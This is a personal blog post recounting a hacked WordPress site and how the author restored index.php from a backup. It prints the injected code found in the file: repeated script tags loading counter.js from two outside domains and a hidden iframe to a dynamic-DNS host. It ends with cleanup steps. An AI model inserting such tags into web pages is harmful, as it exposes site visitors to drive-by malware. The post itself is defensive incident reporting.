Woke up today morning to find that my WordPress blog was not working. I got the following as part of the error message when loading the site:

Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/

Googling the same, I found out that it was caused by either by a worm or virus which steals your WordPress password and hacks all the index pages on your website. In mine it had added the following:

<!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.js”></script><!– ~ –><!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.js”></script><!– ~ –><!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.js”></script><!– ~ –><!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.js”></script><!– ~ –><!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.j
<iframe src=”http://scudocomercial.myftp.biz:8080/ts/in.cgi?open7″ width=366 height=0 style=”visibility: hidden”></iframe>

I replaced the index.php from a backup of my site and my site was up again. When I compared it with the original version I found that it had changed line 17 of my index.php file require(‘./wp-blog-header.php’); to require(‘./wp-blog- Maybe it was a coding error on part of the virus/worm writer. The contents of the original index.php file are shown below. Probably if you don’t have a backup you can copy and paste the same to your index.php file but I cannot guarantee anything.

<?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);

/** Loads the WordPress Environment and Template */
require(‘./wp-blog-header.php’);
?>

If you got hacked, do the following:

1. Back up your database (you can try the WP-DBManager plugin for WordPress)
2. Backup your WordPress installation folder (ftp it using something like Filezilla)
3. Check whether your .htaccess file(s) have been modified or new ones created.
4. Change your passwords
5. Do a complete scan of your local system using Avast or Avira antivirus.
6. Report the attack to your web hosting provider

Comment on this post

If you would like to make a comment, please fill out the form below.